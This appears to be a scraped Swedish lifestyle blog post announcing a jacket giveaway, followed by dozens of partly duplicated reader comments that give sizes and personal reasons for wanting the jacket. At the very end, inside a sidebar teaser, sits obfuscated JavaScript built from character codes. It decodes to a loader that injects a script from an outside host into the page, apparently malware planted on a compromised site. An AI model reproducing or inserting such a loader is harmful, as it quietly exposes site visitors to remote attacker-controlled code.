TÄVLING! Inget komplicerat, jag tävlar ut en ursnygg jacka från Loveforever! Lycka till =)

 

IMG_3461

 

Hej Vännen!

Som jag tidigare skrev så skulle det komma en TÄVLING här på bloggen, så nu kör vi!

Denna ursnygga vår/sommar jacka som ni ser är min. Men min väninna Terece som designar kläderna från Loveforver låter mig tävla ut just en jacka utav samma färg som jag själv har. Jackan har ett värde utav 1379:-IMG_3462

 

Det enda DU behöver göra är att Gilla & DELA detta inlägget på din facebook sida, samt skriva en kommentar här inne på bloggen om varför just du vill ha denna Jackan =) Glöm bara inte att säga vilken storlek du önskar också =)

Så varför komplicera det mer än nödvändigt? Nu tävlar vi! =)

21498398-origpic-7ac8ea

På bilden ovan ser ni från vänster Terece ägare och designer för Loveforever, Sara Thjulander och Johanna Toftby i samma snygga färg som den jackan jag tävlar ut =)

Ikväll blev det afterwork med härliga Kalmar tjejer, jag syndade till det med en lattè OCH en chokladkaka! Shit vad gott! Men det var första och sista gången på länge! Nu är det noll tolerans fram till midsommar. Jag får dessutom tillbaka mitt körkort på Onsdag, då är det 6 träningspass i veckan som gäller PÅ gymmet. Inget fel på att träna hemma, men jag jag håller på att längta ihjäl mig efter mitt gym!

IMG_3452

IMG_3453

IMG_3457

Inget mer syndande för min del nu, denna chokladkakan kommer jag att leva länge på 😉

Så för att återgå till TÄVLINGEN, Gilla inlägget, DELA inlägget, lämna en kommentar och skriv ner din storlek, LYCKA TILL! Massa kramar / My Martens

 

145 Komentarer

 1. Jag älskar färger men är så rädd för att ta på mig något med färg men denna ursnygga jacka skulle definitivt råda bot på min färgrädlsa.

 2. Jag vill gärna vinna denna jackan, då jag gjort en gastric bypass operation för 10 dagar sedan då jag kämpat och kämpat med min vikt innan. Så jag hade blivit överlycklig att få vinna denna ? hade blivit sporrad till att komma i denna jackan ?
  Storlek L eller XL

 3. Vilken kul tävling!
  Jag älskar ju färger, man blir glad av att bära en härlig färg ?
  Jackan ”skiner som en sol”, och det skulle jag oxå vilja göra..så jag håller tummar och tår och hoppas på vinst!
  (Storlek XS önskar jag vid ev vinst)
  Ha en underbar dag ?
  Kram

 4. Jag älskar färger men är så rädd för att ta på mig något med färg men denna ursnygga jacka skulle definitivt råda bot på min färgrädlsa.

 5. Skulle så gärna vilja vinna en! Sku pigga upp min sommar och ge en extra energi och en dos av självförtroende med en så snygg jacka! M skulle vara passande. Sett denna jacka flertal gånger på nätet. Här på ön inte sett den än. Men tyvärr inget facebook så kan inte vara med ?

 6. Jag vill gärna vinna denna jackan, då jag gjort en gastric bypass operation för 10 dagar sedan då jag kämpat och kämpat med min vikt innan. Så jag hade blivit överlycklig att få vinna denna 🙂 hade blivit sporrad till att komma i denna jackan 🙂
  Storlek L eller XL

 7. Vilken kul tävling!
  Jag älskar ju färger, man blir glad av att bära en härlig färg 🙂
  Jackan ”skiner som en sol”, och det skulle jag oxå vilja göra..så jag håller tummar och tår och hoppas på vinst!
  (Storlek XS önskar jag vid ev vinst)

  Ha en underbar dag 🙂

  Kram

 8. Skulle vara underbart med en galet snygg färgklick i vardagen! En sån fräck jacka skulle ge mig ett välmående leende- mer färg i livet!

 9. Som alla andra vill, så vill jag också VINNA! Brukar inte VINNA. Men jag tycker att jag är värd att vinna denna fina JACKA.
  Är mamma till två underbara pojkar o som ni andra mammor vet så hamnar man av någon konstig anledning på barnavdelningen istället för på sin egna avdelning

 10. Jag skulle verkligen vilja vinna denna jacka, underbar att kunna slänga på sig på kvällen när min kropp värker. Att man dessutom kommer bli snyggaste i stan får mig säkert att klara värken ännu bättre=) Behöver nog xl eller l. Kramen

 11. Skulle så gärna vilja vinna en! Sku pigga upp min sommar och ge en extra energi och en dos av självförtroende med en så snygg jacka! M skulle vara passande. Sett denna jacka flertal gånger på nätet. Här på ön inte sett den än. Men tyvärr inget facebook så kan inte vara med 🙁

 12. Denna jacka skulle vara så kul att vinna då det skulle vara en extra present till mig själv då jag fyller år den 28 juni och sedan är ju dessa jackor urläckra. Skulle bli så glad. Om jag skulle vinna denna fina jacka så skulle jag vilja ha den i storlek M / mvh Hanna lans ?

 13. Denna super snygga jacka skulle passa mig perfekt, har tittat på en sån men då min son har fått cancer och ekonomin inte är den bästa när man är sjukskriven , så har jag inte kunnat fått den till min samling.
  Jag skulle bli överlycklig i fall jag vann den !
  Skulle jag nu vinna vill jag gärna ha den i xl ?

 14. Jättekul med en tävling !! Å en så fin jacka. Om jag skulle vinna tror jag en L blir bra. / Annelie . Gillat å Delat ?

 15. Skulle vara underbart med en galet snygg färgklick i vardagen! En sån fräck jacka skulle ge mig ett välmående leende- mer färg i livet!

 16. Sååå snygg färg på jackan….skulle bli överlycklig om jag fick äran att vinna denna skapelse….:)) och strl L har jag……och vinner inte jag så säger jag Grattis till den som vinner!! :))

 17. Som alla andra vill, så vill jag också VINNA! Brukar inte VINNA. Men jag tycker att jag är värd att vinna denna fina JACKA.
  Är mamma till två underbara pojkar o som ni andra mammor vet så hamnar man av någon konstig anledning på barnavdelningen istället för på sin egna avdelning

 18. Åh den är så fin.Vill självklart vara med och tävla om den. Jag vill vinna den för att det skulle vara kul att gå omkring och få känna sig vacker i den.Jag skulle vilja ha storlek M om jag vann. Håller tummar och tår för vinst. Ha en toppendag.Kram

 19. Jag skulle verkligen vilja vinna denna jacka, underbar att kunna slänga på sig på kvällen när min kropp värker. Att man dessutom kommer bli snyggaste i stan får mig säkert att klara värken ännu bättre=) Behöver nog xl eller l. Kramen

 20. Denna jacka skulle vara så kul att vinna då det skulle vara en extra present till mig själv då jag fyller år den 28 juni och sedan är ju dessa jackor urläckra. Skulle bli så glad. Om jag skulle vinna denna fina jacka så skulle jag vilja ha den i storlek M / mvh Hanna lans 🙂

 21. En rosa jacka i stl s skulle vara jättekul att vinna! Roligt med en jacka med färg när jag annars så ofta väljer svarta. Har självklart delat oxå.

 22. Denna super snygga jacka skulle passa mig perfekt, har tittat på en sån men då min son har fått cancer och ekonomin inte är den bästa när man är sjukskriven , så har jag inte kunnat fått den till min samling.
  Jag skulle bli överlycklig i fall jag vann den !
  Skulle jag nu vinna vill jag gärna ha den i xl 🙂

 23. Jättekul med en tävling !! Å en så fin jacka. Om jag skulle vinna tror jag en L blir bra. / Annelie . Gillat å Delat 🙂

 24. Sååå snygg färg på jackan….skulle bli överlycklig om jag fick äran att vinna denna skapelse….:)) och strl L har jag……och vinner inte jag så säger jag Grattis till den som vinner!! :))

 25. Åh den är så fin.Vill självklart vara med och tävla om den. Jag vill vinna den för att det skulle vara kul att gå omkring och få känna sig vacker i den.Jag skulle vilja ha storlek M om jag vann. Håller tummar och tår för vinst. Ha en toppendag.Kram

 26. En rosa jacka i stl s skulle vara jättekul att vinna! Roligt med en jacka med färg när jag annars så ofta väljer svarta. Har självklart delat oxå.

 27. Åh ja Jag äskar färger och är inte rädd för att visa att jag älskar färg och mönster på kläder 🙂
  Så jag är mer än gärna med 😉

  En strl 36 (om dem är normala i strl) skulle passa perfekt på mig 😛

  Så nu delar jag på fb /Angelica Broman
  och håller tummarna så hårt att dem blir blåa 😉

  Ha en toppendag!

  Kram kram

 28. Gillat & Delat!!
  Givetvis vill jag vara med i denna tävling. Skulle lyckan stå på min sida vill jag ha stl L. Blev fullkomligt förälskad i jackan vid första ögonkastet. Älskar färger, älskar färgglada kläder. Har en en stark rosa scarf som skulle gifta sig perfekt med jackan ?
  Kramar o tack för mysig blogg, har precis hittat hit (såg några av dina bilder på instagram och sedan tävlingen o hit…. )

 29. Skulle behöva lite uppmuntran:-) allt går åt pipan just nu och skulle behöva ngt positivt som gör mig glad igen.

 30. Orange är färgen som gör mig glad. Är jag glad blir andra glada. Att få sprida glädje gör att jag mår bra. Stl. L

 31. Vore jättekul att vinna denna fina jacka storlek M men har inte facebook men vill gärna vara med ändå.
  ha en fortsatt fin måndagskväll.

 32. Gillat & Delat!!

  Givetvis vill jag vara med i denna tävling. Skulle lyckan stå på min sida vill jag ha stl L. Blev fullkomligt förälskad i jackan vid första ögonkastet. Älskar färger, älskar färgglada kläder. Har en en stark rosa scarf som skulle gifta sig perfekt med jackan 🙂

  Kramar o tack för mysig blogg, har precis hittat hit (såg några av dina bilder på instagram och sedan tävlingen o hit…. )

 33. ♥Gillat & delat♥
  Jag skulle jättegärna vilja vinna denna jackan eftersom att jag tycker att du My bär så himla fina kläder hela tiden. Denna jackan har ju du och jag skulle bli så himla glad om jag skulle vinna denna jackan och få ha en likadan jacka som du har. Älskar bara dina kläder som du har på dig. Hoppas att jag kan komma till Öland och få hälsa på dig i din mysiga affär. Jag skulle vilja ha storlek XS på jackan.
  Kram till dig och Lilleman

 34. Skulle behöva lite uppmuntran:-) allt går åt pipan just nu och skulle behöva ngt positivt som gör mig glad igen.

 35. Orange är färgen som gör mig glad. Är jag glad blir andra glada. Att få sprida glädje gör att jag mår bra. Stl. L

 36. Hej!
  Skulle bli överlycklig om jag vinner denna fina jacka. Har haft så mycket tråkigt omkring mig så det skulle glädja mig mycket. Jag brukar aldrig ha någon tur. Men men, jag försöker denna gång. Storlek medium eller large, tror på large.

 37. MEN NEJ! Var min första tanke när jag såg detta! Jag har ju ingen Facebook:( Tog bort den för ett halvår sedan för att lägga min tid på mina barn istället… Då kan jag väl inte vara med och tävla… Eller?? Testar ändå att skriva varför jag vill ha jackan! För att den skulle göra vem som helst läcker!:) Och färgen är ju såå snygg!! Om jag skulle vinna…. Ah då har jag storlek XS. Tack för en fin blogg.

 38. Vore jättekul att vinna denna fina jacka storlek M men har inte facebook men vill gärna vara med ändå.
  ha en fortsatt fin måndagskväll.

 39. Hade blivit så otroligt glad. Hihi Håller tummarna. Storlek S eller M. Bestämmer mig helt om jag vinner. hahahah. ❤️

 40. Otroligt härlig jacka med en färg härlig som solen i sommar! Älskar även dödskallar som jag såg var en detalj på dragkjedjan ?
  Brukar inte ha tur men hoppas på lycka i detta! Kram ?

 41. ♥Gillat & delat♥
  Jag skulle jättegärna vilja vinna denna jackan eftersom att jag tycker att du My bär så himla fina kläder hela tiden. Denna jackan har ju du och jag skulle bli så himla glad om jag skulle vinna denna jackan och få ha en likadan jacka som du har. Älskar bara dina kläder som du har på dig. Hoppas att jag kan komma till Öland och få hälsa på dig i din mysiga affär. Jag skulle vilja ha storlek XS på jackan.
  Kram till dig och Lilleman

 42. Gillar och delat! Efter att jag haft ryggskott fick sonen vattkoppor ? så en orange jacka hade verkligen livat upp veckan ? Önskar
  Mig en st L

 43. Åh va snygg! Skulle bli väldigt glad om jag blev den lyckliga vinnaren då jag krympt & är i behov av en ny snygg jacka! ? Skulle vilja ha strl L tror jag! Bra blogg! Gillat & delat!

 44. Hej!
  Skulle bli överlycklig om jag vinner denna fina jacka. Har haft så mycket tråkigt omkring mig så det skulle glädja mig mycket. Jag brukar aldrig ha någon tur. Men men, jag försöker denna gång. Storlek medium eller large, tror på large.

 45. MEN NEJ! Var min första tanke när jag såg detta! Jag har ju ingen Facebook:( Tog bort den för ett halvår sedan för att lägga min tid på mina barn istället… Då kan jag väl inte vara med och tävla… Eller?? Testar ändå att skriva varför jag vill ha jackan! För att den skulle göra vem som helst läcker!:) Och färgen är ju såå snygg!! Om jag skulle vinna…. Ah då har jag storlek XS. Tack för en fin blogg.

 46. Hade blivit så otroligt glad. Hihi Håller tummarna. Storlek S eller M. Bestämmer mig helt om jag vinner. hahahah. ❤️

 47. Otroligt härlig jacka med en färg härlig som solen i sommar! Älskar även dödskallar som jag såg var en detalj på dragkjedjan 🙂
  Brukar inte ha tur men hoppas på lycka i detta! Kram 🙂

 48. Hej
  Gillat och delat på FB!
  Vinner jag den snygga jackan så ska min älskade dotter få den av mig. Hon har nyligen kämpat sig igenom mycket svår cancer. Hon är en kämpe och så värd den fina jackan. Storlek Large.
  Vi har gråtit ihop många gånger, men nu när hon övervunnit den hemska sjukdomen så skrattar vi ihop istället. Håller tummar och tår att just jag den fina vinsten får!!!
  Kram

 49. Jackan var sååå snygg och i ärlighetens namn var det år och dagar sedan jag hade råd att köpa en snygg jacka. Färgen var gudomlig, den ger bra energi ? Min storlek är XL och jag håller tummarna

 50. Efter att ha gått ner 46 kilo så är det kul att unna sig kläder. Dock har jag inte råd att köpa ny jacka så detta vore ett perfekt tillfälle att vinna en.. ? Gärna i storlek M..

 51. Gillar och delat! Efter att jag haft ryggskott fick sonen vattkoppor 🙁 så en orange jacka hade verkligen livat upp veckan 🙂 Önskar
  Mig en st L

 52. Åh va snygg! Skulle bli väldigt glad om jag blev den lyckliga vinnaren då jag krympt & är i behov av en ny snygg jacka! 🙂 Skulle vilja ha strl L tror jag! Bra blogg! Gillat & delat!

 53. Om jag vinner ger jag den till mig själv
  ” för att jag är värd den”
  Den är ju så snygg, gillar färgen ? storlek L

 54. Hej

  Gillat och delat på FB!

  Vinner jag den snygga jackan så ska min älskade dotter få den av mig. Hon har nyligen kämpat sig igenom mycket svår cancer. Hon är en kämpe och så värd den fina jackan. Storlek Large.
  Vi har gråtit ihop många gånger, men nu när hon övervunnit den hemska sjukdomen så skrattar vi ihop istället. Håller tummar och tår att just jag den fina vinsten får!!!
  Kram

 55. Jackan var sååå snygg och i ärlighetens namn var det år och dagar sedan jag hade råd att köpa en snygg jacka. Färgen var gudomlig, den ger bra energi 🙂 Min storlek är XL och jag håller tummarna

 56. Efter att ha gått ner 46 kilo så är det kul att unna sig kläder. Dock har jag inte råd att köpa ny jacka så detta vore ett perfekt tillfälle att vinna en.. 🙂 Gärna i storlek M..

 57. Om jag vinner ger jag den till mig själv
  ” för att jag är värd den”
  Den är ju så snygg, gillar färgen 😉 storlek L

 58. Jag skulle bli så fin i en rosa jacka till mitt ny fixade hår har tänkt köpa men har inte råd just nu ☺

 59. Ååå vad snygg jag skulle känna mig om jag vann denna jacka nu när jag har gått ner i vikt och allt. Färgen är bara superb!! Om jag skulle vinna vill jag ha storlek L ?

 60. Jag skulle bli så fin i en rosa jacka till mitt ny fixade hår har tänkt köpa men har inte råd just nu ☺

 61. Ååå vad snygg jag skulle känna mig om jag vann denna jacka nu när jag har gått ner i vikt och allt. Färgen är bara superb!! Om jag skulle vinna vill jag ha storlek L 🙂

 62. Självklart vill jag vara med och tävla om denna snygga jackan!
  Hoppas att turen är på min sida ?
  Har storlek S.
  Kram

 63. Hej My. Gillat och delat. Sicken härlig jacka. Den önskar jag vinna för att få skina. Storlek L i så fall. Kram.

 64. Självklart vill jag vara med och tävla om denna snygga jackan!
  Hoppas att turen är på min sida 🙂
  Har storlek S.
  Kram

 65. Hej My. Gillat och delat. Sicken härlig jacka. Den önskar jag vinna för att få skina. Storlek L i så fall. Kram.

 66. Det vore härligt att få vinna denna jacka med lite färg på. super snygg, våga lite för en gångs skull, Med lite färg på livet det behöver jag just nu, efter denna vår då min älskade pappa hastigt gick bort, han hade gillat att se mig i en färg för att få mig glad igen, Har rasat i kilon pga. olika tråkigheter så st. smal vore nog bra. gillat och delat, hoppas vinner aldrig nåt, vore roligt att få ha lite tur, så kanske allt vänder i livet o min högsta dröm går i uppfyllelse . kram

 67. Det vore härligt att få vinna denna jacka med lite färg på. super snygg, våga lite för en gångs skull, Med lite färg på livet det behöver jag just nu, efter denna vår då min älskade pappa hastigt gick bort, han hade gillat att se mig i en färg för att få mig glad igen, Har rasat i kilon pga. olika tråkigheter så st. smal vore nog bra. gillat och delat, hoppas vinner aldrig nåt, vore roligt att få ha lite tur, så kanske allt vänder i livet o min högsta dröm går i uppfyllelse . kram

 68. Åhhh vilken DRÖMJACKA…Har spanat på dom men inte tagit mig råd då jag är sjukskriven pga en svår bilolycka..
  Dessutom ärjag oftast eller ALLTID klädd i SVART om jag ska vara helt ärlig…Få vinna denna o ha i sommar, tidig höst vore ju helt underbart..snacka om att jag skulle bli en färgklick..haha..Fyller dessutom år 15.e juni oh hoppas innerligt på tur..
  Du skulle göra min sommar – varm hoppfull kram fr mig Maria B

 69. Varför jag vill vinna…jo står faktiskt MONA på den ;)—behöver få känna mej lite snyg igen…varit lite nere…men på G igen….storlek är dom normala så 40…nu ska jag hålla tummar o tår tills dragningen

 70. Åhhh vilken DRÖMJACKA…Har spanat på dom men inte tagit mig råd då jag är sjukskriven pga en svår bilolycka..

  Dessutom ärjag oftast eller ALLTID klädd i SVART om jag ska vara helt ärlig…Få vinna denna o ha i sommar, tidig höst vore ju helt underbart..snacka om att jag skulle bli en färgklick..haha..Fyller dessutom år 15.e juni oh hoppas innerligt på tur..

  Du skulle göra min sommar – varm hoppfull kram fr mig Maria B

 71. Varför jag vill vinna…jo står faktiskt MONA på den ;)—behöver få känna mej lite snyg igen…varit lite nere…men på G igen….storlek är dom normala så 40…nu ska jag hålla tummar o tår tills dragningen

 72. Åh, hoppas att tävlingen inte är slut. Såg inget slutdatum och här måste jag ju bara vara med och prova lyckan! Den här jackan är ju helt underbar! Snyggaste jag sett på länge och det kryper i hela kroppen; vill ha, vill ha, vill ha….
  Så skulle jag ha den ofantligt stora turen med mig så vill jag ha stl L!

 73. Åh, hoppas att tävlingen inte är slut. Såg inget slutdatum och här måste jag ju bara vara med och prova lyckan! Den här jackan är ju helt underbar! Snyggaste jag sett på länge och det kryper i hela kroppen; vill ha, vill ha, vill ha….
  Så skulle jag ha den ofantligt stora turen med mig så vill jag ha stl L!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/